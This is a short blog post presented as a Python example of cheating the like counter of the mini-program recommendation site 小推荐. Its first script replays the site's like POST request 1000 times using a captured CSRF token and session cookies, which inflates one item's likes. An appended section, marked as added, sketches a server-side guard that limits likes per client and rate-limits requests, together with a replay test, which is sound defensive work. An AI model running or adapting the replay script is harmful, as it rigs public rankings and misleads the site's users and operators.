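Python example: like-count cheating on the 小推荐 site
2017-05-24
By_syk
小推荐 is a site that recommends (WeChat) mini programs.
Its like action is a POST request sent via Ajax, and the requests can be issued back to back with no account, no pool of IPs and no page refresh. This is a logic flaw (apparently intentional).
The following uses inflating the like count of 小推荐 | 酷安日图 as the example: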
```python
import urllib.parse
from urllib import request

# Like endpoint that the page calls via Ajax
url = "http://xiao.lieyunwang.com/app/add-like"
# Headers taken from one browser session; the same CSRF token and cookies are reused for every request
headers = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-CSRF-Token": "UGhPSDZMLXoxXw5xbwhoPwY3PgpBA3kXZAF/BnUuYhJgXXcpY3piSQ==",
    "X-Requested-With": "XMLHttpRequest",
    "Cookie": "UM_distinctid=15c35eee9ff22-0669381c80c8ed-3321482e-38400-15c35eeea01171; Hm_lvt_e7e035075002bfbbfb97dd1986670572=1495553469,1495553548,1495553753; advanced-frontend=ospm873er826gbs9svca32shb5; _csrf-frontend=1c300d11bdbec17ab216ae4f690dee081a6a4859addc395d179a4ba42c5e05b0a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22a7A9YDEEV_qBwOTm4i0NCbOh058aU6O3%22%3B%7D; CNZZDATA1261136383=168195640-1495552863-null%7C1495593396"
}
# Form body: the slug of the item being liked plus the CSRF token
req_data = urllib.parse.urlencode({
    "slug": "ku-an-ri-tu",
    "crsfParam": "UGhPSDZMLXoxXw5xbwhoPwY3PgpBA3kXZAF/BnUuYhJgXXcpY3piSQ=="
}).encode("utf-8")
for i in range(1000):  # 1000 times
    req = request.Request(url=url, headers=headers, data=req_data)
    res = request.urlopen(req)
    res_data = res.read()
    res_data = res_data.decode("utf-8")
    # Print the request number and whether the response body contains "请求成功" ("request succeeded")
    print(i + 1, "请求成功" in res_data)
```
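The loop above works because the endpoint counts every POST, even when the session and slug are identical. The following is an added example, not code from the original post or from the site, sketching the server-side check that is missing: one like per client per item plus a per-client rate limit. `LikeGuard`, `replay`, the `client_id` values and the limits are hypothetical names and numbers chosen for illustration.

```python
import time
from collections import defaultdict, deque


class LikeGuard:
    """Hypothetical server-side state for a like endpoint (illustration only)."""

    def __init__(self, max_per_window=5, window_seconds=60.0, clock=time.monotonic):
        self.max_per_window = max_per_window
        self.window_seconds = window_seconds
        self.clock = clock
        self.liked = set()                  # (client_id, slug) pairs already counted
        self.recent = defaultdict(deque)    # client_id -> timestamps of recent attempts
        self.counts = defaultdict(int)      # slug -> accepted likes

    def add_like(self, client_id, slug):
        # client_id is assumed to be something the server controls, e.g. an
        # authenticated account id, or a server-issued session id plus source IP.
        now = self.clock()
        window = self.recent[client_id]
        # Drop attempts that have aged out of the sliding window.
        while window and now - window[0] >= self.window_seconds:
            window.popleft()
        if len(window) >= self.max_per_window:
            return "rate_limited"
        window.append(now)
        # Idempotency: the same client liking the same item again changes nothing.
        if (client_id, slug) in self.liked:
            return "duplicate"
        self.liked.add((client_id, slug))
        self.counts[slug] += 1
        return "counted"


def replay(guard, client_id, slug, n):
    """Send n identical like requests from one client and tally the outcomes."""
    tally = defaultdict(int)
    for _ in range(n):
        tally[guard.add_like(client_id, slug)] += 1
    return dict(tally)


if __name__ == "__main__":
    guard = LikeGuard()
    # Constructed input: 1000 repeats from one session, as in the loop above.
    print(replay(guard, "sess-A", "ku-an-ri-tu", 1000), guard.counts["ku-an-ri-tu"])
```

A run of `rate_limited` results from one client is also a useful signal to log and alert on.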